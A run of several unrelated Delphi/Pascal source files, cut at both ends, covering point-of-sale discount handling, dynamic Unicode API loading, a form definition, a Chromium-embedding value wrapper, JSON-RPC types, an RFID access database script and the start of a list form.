FManualDiscount, FIDSpecialPrice, FIsManualPrice, FIsManualDiscount); FIDPreInventoryMov := 0; FSellingPrice := 0; //Se o error acontecer, tem que tratar if (iError <> 0) then begin // Excecao para manager if Password.HasFuncRight(9) then begin if MsgBox(MSG_QST_DISCOUNT_WAS_REACHED, vbYesNo + vbQuestion) = vbYes then begin DM.fPOS.AddHoldItem(FIDCustomer, FIDPreSale, FIDModel, FIDStore, FQty, FDiscount, FSellingPrice, FCostPrice, FIDUser, FIDCommission, FPreSaleDate, Now, False, True, FIDItemExchange, FDepartment, iError, FIDPreInventoryMov, FIDPreInventoryMovParent, FPromo, FIDDescriptionPrice, FIDVendorPrice, FSuggPrice); end else begin //EditSalePrice.SetFocus; Exit; end; end else begin case iError of -1: begin // Desconto vale se zerar if MsgBox(MSG_QST_ERASE_ALL_DISCOUNT_ADD, vbYesNo + vbQuestion) = vbYes then DM.fPOS.AddHoldItem(FIDCustomer, FIDPreSale, FIDModel, FIDStore, FQty, FDiscount, FSellingPrice, FCostPrice, FIDUser, FIDCommission, FPreSaleDate, Now, True, False, IDItemExchange, FDepartment, iError, FIDPreInventoryMov, FIDPreInventoryMovParent, FPromo, FIDDescriptionPrice, FIDVendorPrice, FSuggPrice); end; -2: begin //EditSalePrice.SetFocus; MsgBox(MSG_INF_DISCOUNT_LIMT_REACHED, vbOKOnly + vbInformation); Exit; end; else begin if FExchange then // Atualiza o Invoice original colocando o numero do Hold with DM.quFreeSQL do begin SQL.Text := 'UPDATE Invoice SET Note = Note + ' + Chr(39) + ' - Exchange from Hold #' + IntToStr(FIDPreSale) + ' ' + Chr(39) + 'WHERE IDInvoice = ' + IntToStr(IDInvoiceExchange); ExecSQL; end; end; end; //end case end; //end else HasFuncRight end; //end Error // Faz a atualização no item gerador da promoção para saber que ele já gerou a promoção. if (iError = 0) and (FPromo = True) and (FIDPreInventoryMovParent <> 0) then UpdateParentPromo(FIDPreInventoryMovParent); end; procedure TSaleItem.Remove; begin end; procedure TSaleItem.Update; var iError: Integer; begin OnBeforeUpdate; DM.fPOS.UpdateHoldItem(FIDPreSale, FIDPreInventoryMov, FIDModel, FIDCommission, FIDUser, FQty, FDiscount, FSellingPrice, FCostPrice, FPreSaleDate, Now, True, True, FDepartment, iError, FIDPreInventoryMov, FIDPreInventoryMovParent, FPromo, FIDDescriptionPrice, FIDVendorPrice, FSuggPrice, FDocumentNumber, FIDDocumentType); if (iError = 0) and (FPromo = True) and (FIDPreInventoryMovParent <> 0) then UpdateParentPromo(FIDPreInventoryMovParent); end; procedure TSaleItem.SetDiscountItem(SaleItem: TSaleItem; DiscountSaleValue: Double; TaxExemptOnSale: Boolean); var IDDiscount: Integer; NewDiscountSale: Double; begin NewDiscountSale := DiscountSaleValue; with DM.quFreeSQL do begin if Active then Close; SQL.Clear; SQL.Text := ' SELECT SubTotal, ItemDiscount FROM Invoice WHERE IDPreSale = ' + InttoStr(SaleItem.IDPreSale); Open; NewDiscountSale := DM.FDMCalcPrice.FormatPrice(((NewDiscountSale + FieldByName('ItemDiscount').AsCurrency) * 100)/ FieldByName('SubTotal').AsCurrency); Close; end; DM.fPOS.ManageDiscount(SaleItem.IDPreSale, NewDiscountSale, Now, TaxExemptOnSale, Password.HasFuncRight(9), False); IDDiscount := DM.GetNextID('Sal_Discount.IDDiscount'); with DM.quFreeSQL do begin if Active then Close; SQL.Clear; SQL.Text := 'INSERT INTO Sal_Discount (IDDiscount,IDPreSale,IDPreInventoryMov,Discount) ' + 'VALUES (' + InttoStr(IDDiscount) + ' , ' + InttoStr(SaleItem.IDPreSale) + ' , ' + InttoStr(Saleitem.IDPreInventoryMov)+ ' , ' + FloattoStr(DiscountSaleValue) + ' ) '; ExecSQL; Close; end; end; procedure TSaleItem.OnBeforeAdd; begin // Opção pede preço. if not(FAskedSalePrice) then ApplyDiscount; end; procedure TSaleItem.OnBeforeUpdate; begin ApplyDiscount; end; procedure TSaleItem.ApplyDiscount; var roundSellingPrice: Extended; begin FIsManager := True; if ((FPromo) and (FPromoSellingPrice < FCustomerSellingPrice) and (FPromoSellingPrice < FKitSellingPrice)) then begin FDiscount := 0; FSellingPrice := DM.FDMCalcPrice.FormatPrice(FPromoSellingPrice); end else if ((FCustomerSellingPrice <> 0) and (FCustomerSellingPrice <> FSellingPrice) and (FCustomerSellingPrice <= FKitSellingPrice)) then begin // AmfSouza November 14, 2012: to round discount. //FDiscount := ((roundSellingPrice - CustomerSellingPrice) * FQty); FDiscount := 0; end else if ((FKitSellingPrice <> 0) and (FKitSellingPrice <> FSellingPrice)) then begin //amfsouza August, 29 2012 FDiscount := 0; FSellingPrice := FKitSellingPrice; //FDiscount := (FSellingPrice - FKitSellingPrice) * FQty end else FIsManager := False; end; procedure TSaleItem.UpdateParentPromo(IDPreInventoryMovParent: Integer); begin with DM.quFreeSQL do begin if Active then Close; SQL.Clear; SQL.Text := ' UPDATE PreInventoryMov SET Promo = 1 ' + ' WHERE IDPreInventoryMov = ' + InttoStr(IDPreInventoryMovParent); ExecSQL; Close; end; end; procedure TSaleItem.CleanUpValues; begin self.FDiscount := 0; self.FCostPrice := 0; self.FSellingPrice := 0; self.FQty := 0; self.FIDModel := 0; self. FIDVendorPrice := 0; self.FIDDescriptionPrice := 0; // Antonio Apr 2014 03 - new fields to sp addItem self.FManualPrice := 0; self.FManualDiscount := 0; self.FIDSpecialPrice := 0; self.FIsManualPrice := false; self.FIsManualDiscount := false; self.EachDiscount := 0; self.ManualDiscount := 0; self.SellingPrice := 0; self.IsManualDiscount := false; self.IsManualPrice := false; end; end.
unit VirtualUnicodeDefines; // Version 1.3.0 // // The contents of this file are subject to the Mozilla Public License // Version 1.1 (the "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at http://www.mozilla.org/MPL/ // // Alternatively, you may redistribute this library, use and/or modify it under the terms of the // GNU Lesser General Public License as published by the Free Software Foundation; // either version 2.1 of the License, or (at your option) any later version. // You may obtain a copy of the LGPL at http://www.gnu.org/copyleft/. // // Software distributed under the License is distributed on an "AS IS" basis, // WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for the // specific language governing rights and limitations under the License. // // The initial developer of this code is Jim Kueneman <jimdk@mindspring.com> // //---------------------------------------------------------------------------- // This unit remaps Unicode API functions to dynamiclly loaded functions so that Win95 // applications can still use VSTools. // The following are implemented in Win 95: // EnumResourceLanguagesW // EnumResourceNamesW // EnumResourceTypesW // ExtTextOutW // FindResourceW // FindResourceExW // GetCharWidthW // GetCommandLineW // GetTextExtentPoint32W // GetTextExtentPointW // lstrlenW // MessageBoxExW // MessageBoxW // MultiByteToWideChar // TextOutW // WideCharToMultiByte interface {$include Compilers.inc} {$include VSToolsAddIns.inc} uses Windows, Messages, SysUtils, Classes, Graphics, Controls, ShellAPI, ActiveX, ShlObj, ComCtrls, ComObj, Forms, CommCtrl; {$IFNDEF T2H} var GetDriveTypeW_VST: function(lpRootPathName: PWideChar): UINT; stdcall; DrawTextW_VST: function(hDC: HDC; lpString: PWideChar; nCount: Integer; var lpRect: TRect; uFormat: UINT): Integer; stdcall; SHGetFileInfoW_VST: function(pszPath: PWideChar; dwFileAttributes: DWORD; var psfi: TSHFileInfoW; cbFileInfo, uFlags: UINT): DWORD; stdcall; CreateFileW_VST: function(lpFileName: PWideChar; dwDesiredAccess, dwShareMode: DWORD; lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: DWORD; hTemplateFile: THandle): THandle; stdcall; SHGetDataFromIDListW_VST: function(psf: IShellFolder; pidl: PItemIDList; nFormat: Integer; ptr: Pointer; cb: Integer): HResult; stdcall; FindFirstFileW_VST: function(lpFileName: PWideChar; var lpFindFileData: TWIN32FindDataW): THandle; stdcall; GetDiskFreeSpaceW_VST: function(lpRootPathName: PWideChar; var lpSectorsPerCluster, lpBytesPerSector, lpNumberOfFreeClusters, lpTotalNumberOfClusters: DWORD): BOOL; stdcall; lstrcmpiW_VST: function(lpString1, lpString2: PWideChar): Integer; stdcall; CharLowerBuffW_VST: function(lpsz: PWideChar; cchLength: DWORD): DWORD; stdcall; CreateDirectoryW_VST: function(lpPathName: PWideChar; lpSecurityAttributes: PSecurityAttributes): BOOL; stdcall; GetFullPathNameW_VST: function(lpFileName: PWideChar; nBufferLength: DWORD; lpBuffer: PWideChar; var lpFilePart: PWideChar): DWORD; stdcall; ShellExecuteExW_VST: function(lpExecInfo: PShellExecuteInfoW):BOOL; stdcall; FindFirstChangeNotificationW_VST: function(lpPathName: PWideChar; bWatchSubtree: BOOL; dwNotifyFilter: DWORD): THandle; stdcall; GetCharABCWidthsW_VST: function(DC: HDC; FirstChar, LastChar: UINT; const ABCStructs): BOOL; stdcall; GetFileAttributesW_VST: function(lpFileName: PWideChar): DWORD; stdcall; GetSystemDirectoryW_VST: function(lpBuffer: PWideChar; uSize: UINT): UINT; stdcall; GetWindowsDirectoryW_VST: function(lpBuffer: PWideChar; uSize: UINT): UINT; stdcall; // Robert SHMultiFileProperties_VST: function(pdtobj: IDataObject; dwFlags: DWORD): HResult; stdcall; GetDiskFreeSpaceExA_VST: function(lpDirectoryName: PAnsiChar; var lpFreeBytesAvailableToCaller, lpTotalNumberOfBytes; lpTotalNumberOfFreeBytes: PLargeInteger): BOOL; stdcall; GetDiskFreeSpaceExW_VST: function(lpDirectoryName: PWideChar; var lpFreeBytesAvailableToCaller, lpTotalNumberOfBytes; lpTotalNumberOfFreeBytes: PLargeInteger): BOOL; stdcall; {$ENDIF T2H} implementation var Shell32Handle, Kernel32Handle, User32Handle, GDI32Handle: THandle; initialization // We can be sure these are already loaded. This keeps us from having to // reference count when VSTools is being used in an OCX Shell32Handle := GetModuleHandle(Shell32); Kernel32Handle := GetModuleHandle(Kernel32); User32Handle := GetModuleHandle(User32); GDI32Handle := GetModuleHandle(GDI32); GetDiskFreeSpaceExA_VST := GetProcAddress(Kernel32Handle, 'GetDiskFreeSpaceA'); if Win32Platform = VER_PLATFORM_WIN32_NT then begin GetDriveTypeW_VST := GetProcAddress(Kernel32Handle, 'GetDriveTypeW'); DrawTextW_VST := GetProcAddress(User32Handle, 'DrawTextW'); SHGetFileInfoW_VST := GetProcAddress(Shell32Handle, 'SHGetFileInfoW'); CreateFileW_VST := GetProcAddress(Kernel32Handle, 'CreateFileW'); SHGetDataFromIDListW_VST := GetProcAddress(Shell32Handle, 'SHGetDataFromIDListW'); FindFirstFileW_VST := GetProcAddress(Kernel32Handle, 'FindFirstFileW'); lstrcmpiW_VST := GetProcAddress(Kernel32Handle, 'lstrcmpiW'); CharLowerBuffW_VST := GetProcAddress(User32Handle, 'CharLowerBuffW'); CreateDirectoryW_VST := GetProcAddress(Kernel32Handle, 'CreateDirectoryW'); GetFullPathNameW_VST := GetProcAddress(Kernel32Handle, 'GetFullPathNameW'); ShellExecuteExW_VST := GetProcAddress(Shell32Handle, 'ShellExecuteExW'); FindFirstChangeNotificationW_VST := GetProcAddress(Kernel32Handle, 'FindFirstChangeNotificationW'); GetCharABCWidthsW_VST := GetProcAddress(GDI32Handle, 'GetCharABCWidthsW'); GetFileAttributesW_VST := GetProcAddress(Kernel32Handle, 'GetFileAttributesW'); GetSystemDirectoryW_VST := GetProcAddress(Kernel32Handle, 'GetSystemDirectoryW'); GetWindowsDirectoryW_VST := GetProcAddress(Kernel32Handle, 'GetWindowsDirectoryW'); GetDiskFreeSpaceExW_VST := GetProcAddress(Kernel32Handle, 'GetDiskFreeSpaceExW'); // SHMultiFileProperties only supported on Win2k and WinXP // http://msdn.microsoft.com/library/default.asp?url=/library/en-us/shellcc/platform/shell/reference/functions/shmultifileproperties.asp SHMultiFileProperties_VST := GetProcAddress(Shell32Handle, PChar(716)); end; finalization end.
object frmMasks: TfrmMasks Left = 312 Top = 186 ActiveControl = chklMasks BorderStyle = bsDialog BorderWidth = 8 Caption = 'frmMasks' ClientHeight = 274 ClientWidth = 390 Color = clBtnFace Font.Charset = DEFAULT_CHARSET Font.Color = clWindowText Font.Height = -11 Font.Name = 'Tahoma' Font.Style = [] OldCreateOrder = False Position = poScreenCenter OnCreate = FormCreate OnDestroy = FormDestroy OnShow = FormShow DesignSize = ( 390 274) PixelsPerInch = 96 TextHeight = 13 object btnOk: TButton Left = 225 Top = 248 Width = 80 Height = 24 Anchors = [akRight, akBottom] Caption = 'OK' Default = True ModalResult = 1 TabOrder = 1 end object btnCancel: TButton Left = 309 Top = 248 Width = 80 Height = 24 Anchors = [akRight, akBottom] Cancel = True Caption = 'Cancel' ModalResult = 2 TabOrder = 2 end object GroupBox1: TGroupBox Left = 0 Top = 0 Width = 390 Height = 239 Align = alTop TabOrder = 0 DesignSize = ( 390 239) object chklMasks: TCheckListBox Left = 12 Top = 16 Width = 367 Height = 184 Anchors = [akLeft, akTop, akRight, akBottom] Columns = 4 ItemHeight = 13 Items.Strings = ( '*.*' '*.htm*') PopupMenu = pmContext Sorted = True TabOrder = 0 OnClick = chklMasksClick end object edtNew: TEdit Left = 12 Top = 209 Width = 99 Height = 21 TabOrder = 1 end object btnAdd: TButton Left = 120 Top = 208 Width = 80 Height = 24 Caption = '&Add' TabOrder = 2 OnClick = btnAddClick end object btnDelete: TButton Left = 288 Top = 208 Width = 80 Height = 24 Caption = '&Delete' TabOrder = 4 OnClick = btnDeleteClick end object btnReplace: TButton Left = 204 Top = 208 Width = 80 Height = 24 Caption = '&Replace' TabOrder = 3 OnClick = btnReplaceClick end end object pmContext: TPopupActionBar Left = 145 Top = 141 object CheckAll2: TMenuItem Action = acCheckAll end object UncheckAll2: TMenuItem Action = acUncheckAll end object N2: TMenuItem Caption = '-' end object Delete2: TMenuItem Action = acDelete end end object acContext: TActionList Left = 205 Top = 139 object acDelete: TAction Caption = '&Delete' OnExecute = tbxClearClick end object acCheckAll: TAction Caption = 'Check All' OnExecute = tbxCheckAllClick end object acUncheckAll: TAction Caption = 'Uncheck All' OnExecute = tbxUnCheckAllClick end end end
// ************************************************************************ // ***************************** CEF4Delphi ******************************* // ************************************************************************ // // CEF4Delphi is based on DCEF3 which uses CEF3 to embed a chromium-based // browser in Delphi applications. // // The original license of DCEF3 still applies to CEF4Delphi. // // For more information about CEF4Delphi visit : // https://www.briskbard.com/index.php?lang=en&pageid=cef // // Copyright © 2017 Salvador Díaz Fau. All rights reserved. // // ************************************************************************ // ************ vvvv Original license and comments below vvvv ************* // ************************************************************************ (* * Delphi Chromium Embedded 3 * * Usage allowed under the restrictions of the Lesser GNU General Public License * or alternatively the restrictions of the Mozilla Public License 1.1 * * Software distributed under the License is distributed on an "AS IS" basis, * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for * the specific language governing rights and limitations under the License. * * Unit owner : Henri Gourvest <hgourvest@gmail.com> * Web site : http://www.progdigy.com * Repository : http://code.google.com/p/delphichromiumembedded/ * Group : http://groups.google.com/group/delphichromiumembedded * * Embarcadero Technologies, Inc is not permitted to use or redistribute * this source code without explicit permission. * *) unit uCEFValue; {$IFNDEF CPUX64} {$ALIGN ON} {$MINENUMSIZE 4} {$ENDIF} {$I cef.inc} interface uses uCEFBaseRefCounted, uCEFInterfaces, uCEFTypes; type TCefValueRef = class(TCefBaseRefCountedRef, ICefValue) protected function IsValid: Boolean; function IsOwned: Boolean; function IsReadOnly: Boolean; function IsSame(const that: ICefValue): Boolean; function IsEqual(const that: ICefValue): Boolean; function Copy: ICefValue; function GetType: TCefValueType; function GetBool: Boolean; function GetInt: Integer; function GetDouble: Double; function GetString: ustring; function GetBinary: ICefBinaryValue; function GetDictionary: ICefDictionaryValue; function GetList: ICefListValue; function SetNull: Boolean; function SetBool(value: Integer): Boolean; function SetInt(value: Integer): Boolean; function SetDouble(value: Double): Boolean; function SetString(const value: ustring): Boolean; function SetBinary(const value: ICefBinaryValue): Boolean; function SetDictionary(const value: ICefDictionaryValue): Boolean; function SetList(const value: ICefListValue): Boolean; public class function UnWrap(data: Pointer): ICefValue; class function New: ICefValue; end; implementation uses uCEFMiscFunctions, uCEFLibFunctions, uCEFBinaryValue, uCEFListValue, uCEFDictionaryValue; function TCefValueRef.Copy: ICefValue; begin Result := UnWrap(PCefValue(FData).copy(FData)); end; function TCefValueRef.GetBinary: ICefBinaryValue; begin Result := TCefBinaryValueRef.UnWrap(PCefValue(FData).get_binary(FData)); end; function TCefValueRef.GetBool: Boolean; begin Result := PCefValue(FData).get_bool(FData) <> 0; end; function TCefValueRef.GetDictionary: ICefDictionaryValue; begin Result := TCefDictionaryValueRef.UnWrap(PCefValue(FData).get_dictionary(FData)); end; function TCefValueRef.GetDouble: Double; begin Result := PCefValue(FData).get_double(FData); end; function TCefValueRef.GetInt: Integer; begin Result := PCefValue(FData).get_int(FData); end; function TCefValueRef.GetList: ICefListValue; begin Result := TCefListValueRef.UnWrap(PCefValue(FData).get_list(FData)); end; function TCefValueRef.GetString: ustring; begin Result := CefStringFreeAndGet(PCefValue(FData).get_string(FData)); end; function TCefValueRef.GetType: TCefValueType; begin Result := PCefValue(FData).get_type(FData); end; function TCefValueRef.IsEqual(const that: ICefValue): Boolean; begin Result := PCefValue(FData).is_equal(FData, CefGetData(that)) <> 0; end; function TCefValueRef.IsOwned: Boolean; begin Result := PCefValue(FData).is_owned(FData) <> 0; end; function TCefValueRef.IsReadOnly: Boolean; begin Result := PCefValue(FData).is_read_only(FData) <> 0; end; function TCefValueRef.IsSame(const that: ICefValue): Boolean; begin Result := PCefValue(FData).is_same(FData, CefGetData(that)) <> 0; end; function TCefValueRef.IsValid: Boolean; begin Result := PCefValue(FData).is_valid(FData) <> 0; end; class function TCefValueRef.New: ICefValue; begin Result := UnWrap(cef_value_create()); end; function TCefValueRef.SetBinary(const value: ICefBinaryValue): Boolean; begin Result := PCefValue(FData).set_binary(FData, CefGetData(value)) <> 0; end; function TCefValueRef.SetBool(value: Integer): Boolean; begin Result := PCefValue(FData).set_bool(FData, value) <> 0; end; function TCefValueRef.SetDictionary(const value: ICefDictionaryValue): Boolean; begin Result := PCefValue(FData).set_dictionary(FData, CefGetData(value)) <> 0; end; function TCefValueRef.SetDouble(value: Double): Boolean; begin Result := PCefValue(FData).set_double(FData, value) <> 0; end; function TCefValueRef.SetInt(value: Integer): Boolean; begin Result := PCefValue(FData).set_int(FData, value) <> 0; end; function TCefValueRef.SetList(const value: ICefListValue): Boolean; begin Result := PCefValue(FData).set_list(FData, CefGetData(value)) <> 0; end; function TCefValueRef.SetNull: Boolean; begin Result := PCefValue(FData).set_null(FData) <> 0; end; function TCefValueRef.SetString(const value: ustring): Boolean; var s: TCefString; begin s := CefString(value); Result := PCefValue(FData).set_string(FData, @s) <> 0; end; class function TCefValueRef.UnWrap(data: Pointer): ICefValue; begin if data <> nil then Result := Create(data) as ICefValue else Result := nil; end; end.
{*****************************************************************} { ceostypes is part of Ceos middleware/n-tier JSONRPC components } { } { Beta version } { } { This library is distributed in the hope that it will be useful, } { but WITHOUT ANY WARRANTY; without even the implied warranty of } { MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. } { } { by Jose Benedito - josebenedito@gmail.com } { www.jbsolucoes.net } {*****************************************************************} unit ceostypes; {$mode objfpc}{$H+} interface uses Classes, SysUtils, variants, fpjson, jsonparser; type TCeosArgsType = array of variant; { TCeosRequestContent } TCeosRequestContent = class(TJSONObject) private FParams: TJSONArray; function GetArgs: TJSONArray; function GetID: integer; function GetMethod: string; procedure SetID(AValue: integer); procedure SetMethod(AValue: string); public constructor create; destructor destroy; override; property ID: integer read GetID write SetID; property Method: string read GetMethod write SetMethod; property Args: TJSONArray read GetArgs; end; { TCeosResponseContent } TCeosResponseContent = class(TJSONObject) private function GetID: integer; function GetResult: TJSONData; function GetVersion: string; procedure SetID(AValue: integer); procedure SetResult(AValue: TJSONData); procedure SetVersion(AValue: string); public procedure SetResultContent(const AResult: TJSONData; const AID: integer); constructor Create; destructor Destroy; override; property ID: integer read GetID write SetID; property ResultContent: TJSONData read GetResult write SetResult; property Version: string read GetVersion write SetVersion; end; function GetVariantType(const v: variant): string; function GetJSONArray(AArray: array of variant): TJSONArray; //default jsonrpc result response function JSONRPCResult(const AResult: TJSONData; const AID: integer = -1): TCeosResponseContent; //default jsonrpc error response function JSONRPCError(const ACode: integer; const AMessage: string; AID: integer = -1): TCeosResponseContent; implementation uses ceosconsts; function JSONRPCResult(const AResult: TJSONData; const AID: integer = -1): TCeosResponseContent; var joResult: TCeosResponseContent; //s: string; begin joResult := TCeosResponseContent.create; joResult.Version := JSONRPC_VERSION; joResult.ResultContent := AResult; joResult.ID := AID; result := joResult; //s := joResult.AsJSON; //s := ''; end; function JSONRPCError(const ACode: integer; const AMessage: string; AID: integer = -1): TCeosResponseContent; var jsonerror: TJSONObject; joResult: TCeosResponseContent; begin jsonerror := TJSONObject.Create(); (jsonerror as TJSONObject).Add('code',ACode); (jsonerror as TJSONObject).Add('message',AMessage); joResult := TCeosResponseContent.create; //joResult.Add('jsonrpc',JSONRPC_VERSION); joResult.Add('error',jsonerror); joResult.ID := AID; result := joResult; end; function GetVariantType(const v: variant): string; begin case TVarData(v).vType of varEmpty: result := 'Empty'; varNull: result := 'Null'; varSmallInt: result := 'SmallInt'; varInteger: result := 'Integer'; varSingle: result := 'Single'; varDouble: result := 'Double'; varCurrency: result := 'Currency'; varDate: result := 'Date'; varOleStr: result := 'OleStr'; varDispatch: result := 'Dispatch'; varError: result := 'Error'; varBoolean: result := 'Boolean'; varVariant: result := 'Variant'; varUnknown: result := 'Unknown'; varByte: result := 'Byte'; varString: result := 'String'; varTypeMask: result := 'TypeMask'; varArray: result := 'Array'; varByRef: result := 'ByRef'; end; // case end; function GetJSONArray(AArray: array of variant): TJSONArray; var joArray: TJSONArray; i, iLen: integer; vtype: tvartype; begin joArray := TJSONArray.create; iLen := High(AArray); for i := 0 to iLen do begin vtype := TVarData(AArray[i]).vType; case vtype of varEmpty: joArray.Add(''); varNull: joArray.Add; varSmallInt: joArray.Add(integer(AArray[i])); varshortint: joArray.Add(integer(AArray[i])); varInteger: joArray.Add(integer(AArray[i])); varSingle: joArray.Add(integer(AArray[i])); varDouble: joArray.Add(TJSONFloat(AArray[i])); varCurrency: joArray.Add(TJSONFloat(AArray[i])); varDate: joArray.Add(datetostr(AArray[i])); varOleStr: joArray.Add(string(AArray[i])); varDispatch: joArray.Add(string(AArray[i])); varError: joArray.Add('error'); varBoolean: joArray.Add(boolean(AArray[i])); varVariant: joArray.Add(string(AArray[i])); varUnknown: joArray.Add(string(AArray[i])); varByte: joArray.Add(integer(AArray[i])); varString: joArray.Add(string(AArray[i])); varTypeMask: joArray.Add(string(AArray[i])); varArray: joArray.Add(GetJSONArray(AArray[i])); varByRef: joArray.Add(integer(AArray[i])); end; end; result := joArray; end; { TCeosResponseContent } function TCeosResponseContent.GetID: integer; begin {$WARNINGS OFF} if TJSONObject(Self).Find('id') <> nil then result := TJSONObject(Self).Find('id').AsInteger else result := -1; {$WARNINGS ON} end; function TCeosResponseContent.GetResult: TJSONData; begin {$WARNINGS OFF} if TJSONObject(Self).Find('result') <> nil then result := TJSONObject(Self).Find('result') else result := nil; {$WARNINGS ON} end; function TCeosResponseContent.GetVersion: string; begin {$WARNINGS OFF} if TJSONObject(Self).Find('jsonrpc') <> nil then result := TJSONObject(Self).Find('jsonrpc').AsString else result := JSONRPC_VERSION; {$WARNINGS ON} end; procedure TCeosResponseContent.SetID(AValue: integer); begin {$WARNINGS OFF} if TJSONObject(Self).Find('id') <> nil then TJSONObject(Self).Find('id').AsInteger := AValue else TJSONObject(Self).Add('id',AValue); {$WARNINGS ON} end; procedure TCeosResponseContent.SetResult(AValue: TJSONData); begin {$WARNINGS OFF} if TJSONObject(Self).Find('result') <> nil then TJSONObject(Self).Delete('result'); TJSONObject(Self).Add('result',AValue); //TJSONObject(Self).Add('result',AValue as TJSONObject); {$WARNINGS ON} end; procedure TCeosResponseContent.SetVersion(AValue: string); begin {$WARNINGS OFF} if TJSONObject(Self).Find('jsonrpc') <> nil then TJSONObject(Self).Find('jsonrpc').AsString := AValue else TJSONObject(Self).Add('jsonrpc',AValue); {$WARNINGS ON} end; procedure TCeosResponseContent.SetResultContent(const AResult: TJSONData; const AID: integer); begin Self.Clear; Self.Version := JSONRPC_VERSION; Self.ResultContent := AResult; Self.ID := AID; end; constructor TCeosResponseContent.Create; begin inherited Create; Self.Version := JSONRPC_VERSION; Self.ID := 0; end; destructor TCeosResponseContent.Destroy; begin inherited Destroy; end; { TCeosRequestContent } function TCeosRequestContent.GetArgs: TJSONArray; begin if Find('params') <> nil then result := (Find('params') as TJSONArray) else begin FParams := TJSONArray.Create; self.Add('params',FParams); result := (Find('params') as TJSONArray); end; end; function TCeosRequestContent.GetID: integer; begin if Self.Find('id') <> nil then result := Self.Find('id').AsInteger else begin Self.Add('id',0); result := 0; end; end; function TCeosRequestContent.GetMethod: string; begin if Self.Find('method') <> nil then result := Self.Find('method').AsString else begin Self.Add('method',''); result := ''; end; end; procedure TCeosRequestContent.SetID(AValue: integer); begin if Self.Find('id') <> nil then Self.Find('id').AsInteger := AValue else Self.Add('id',AValue); end; procedure TCeosRequestContent.SetMethod(AValue: string); begin if Self.Find('method') <> nil then Self.Find('method').AsString := AValue else Self.Add('method',AValue); end; constructor TCeosRequestContent.create; begin inherited create; FParams := TJSONArray.create; Self.Add('jsonrpc',JSONRPC_VERSION); Self.Add('method',''); Self.Add('params',FParams); Self.Add('id',0); end; destructor TCeosRequestContent.destroy; begin inherited destroy; end; end.
{ ============================================ Software Name : RFID_ACCESS ============================================ } { ******************************************** } { Written By WalWalWalides } { CopyRight © 2019 } { Email : WalWalWalides@gmail.com } { GitHub :https://github.com/walwalwalides } { ******************************************** } unit UScript; interface uses FireDAC.Comp.Script; procedure CreateTableAccessInfo; procedure BuildTable; procedure CreateTableAccessLog; implementation uses MainModule; procedure CreateData_Table; var tmpScript: TFDScript; begin tmpScript := TFDScript.Create(nil); tmpScript.Connection := DMMainModule.SqlitConnection(); with tmpScript.SQLScripts do begin Clear; with Add do begin Name := 'Data_Table'; SQL.Add('DROP TABLE IF EXISTS Data_Table ;'); SQL.Add('create table Data_Table('); SQL.Add('Id INT NOT NULL AUTO_INCREMENT,'); SQL.Add('VTYPE INT,'); SQL.Add('KIND_ID INT,'); SQL.Add('PRIMARY KEY ( Id )'); SQL.Add(');'); end; end; try tmpScript.ValidateAll; tmpScript.ExecuteAll; finally tmpScript.free; end; end; procedure CreateTableAccessLog; var tmpScript: TFDScript; begin tmpScript := TFDScript.Create(nil); tmpScript.Connection := DMMainModule.SqlitConnection(); with tmpScript.SQLScripts do begin Clear; with Add do begin Name := 'Accesslog'; SQL.Add('CREATE TABLE IF NOT EXISTS Accesslog('); SQL.Add('Id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,'); SQL.Add('UID VARCHAR(10) NOT NULL,'); SQL.Add('Enter DATETIME'); SQL.Add(');'); end; end; try tmpScript.ValidateAll; tmpScript.ExecuteAll; finally tmpScript.free; end; end; procedure CreateTableAccessInfo; var tmpScript: TFDScript; begin tmpScript := TFDScript.Create(nil); tmpScript.Connection := DMMainModule.SqlitConnection(); with tmpScript.SQLScripts do begin Clear; with Add do begin Name := 'Access'; SQL.Add('CREATE TABLE IF NOT EXISTS AccessInfo('); SQL.Add('Id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,'); SQL.Add('FirstName VARCHAR(255) NOT NULL,'); SQL.Add('LastName VARCHAR(255) NOT NULL,'); SQL.Add('UID VARCHAR(10) NOT NULL'); SQL.Add(');'); end; end; try tmpScript.ValidateAll; tmpScript.ExecuteAll; finally tmpScript.free; end; end; procedure InsertTableAccess; var tmpScript: TFDScript; begin tmpScript := TFDScript.Create(nil); tmpScript.Connection := DMMainModule.SqlitConnection(); with tmpScript.SQLScripts do begin Clear; with Add do begin SQL.Add('INSERT INTO Access (Id,LastName,FirstName,Age,Present,ProfileImage)'); SQL.Add('VALUES'); SQL.Add('(1,"ALex","Alex",30,true,'');'); end; end; try tmpScript.ValidateAll; tmpScript.ExecuteAll; finally tmpScript.free; end; end; procedure BuildTable; begin CreateTableAccessInfo; CreateTableAccessLog; // InsertTable; // CreateData_Table; end; end.
unit ufrmDaftarCompetitor; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ufrmMasterBrowse, StdCtrls, ExtCtrls, ActnList, cxGraphics, cxControls, cxLookAndFeels, cxLookAndFeelPainters, dxBarBuiltInMenu, cxStyles, cxDataStorage, cxEdit, cxNavigator, Data.DB, cxDBData, cxContainer, Vcl.ComCtrls, dxCore, cxDateUtils, Vcl.Menus, System.Actions, ufraFooter4Button, cxButtons, cxTextEdit, cxMaskEdit, cxDropDownEdit, cxCalendar, cxLabel, cxGridLevel, cxClasses, cxGridCustomView, cxGridCustomTableView, cxGridTableView, cxGridDBTableView, cxGrid, cxPC, Datasnap.DBClient, cxCustomData, cxFilter, cxData; type TfrmDaftarCompetitor = class(TfrmMasterBrowse) actAddDaftarKompetitor: TAction; actDeleteDaftarKompetitor: TAction; actEditDaftarKompetitor: TAction; actlstDaftarCompetitor: TActionList; actRefreshDaftarKompetitor: TAction; procedure actAddExecute(Sender: TObject); procedure actEditExecute(Sender: TObject); procedure FormDestroy(Sender: TObject); private FCDS: TClientDataSet; property CDS: TClientDataSet read FCDS write FCDS; public procedure RefreshData; override; end; var frmDaftarCompetitor: TfrmDaftarCompetitor; implementation uses ufrmDialogDaftarKompetitor, uDBUtils, uDMClient, uDXUtils; {$R *.dfm} procedure TfrmDaftarCompetitor.actAddExecute(Sender: TObject); begin inherited; ShowDialogForm(TfrmDialogDaftarKompetitor); end; procedure TfrmDaftarCompetitor.actEditExecute(Sender: TObject); begin inherited; 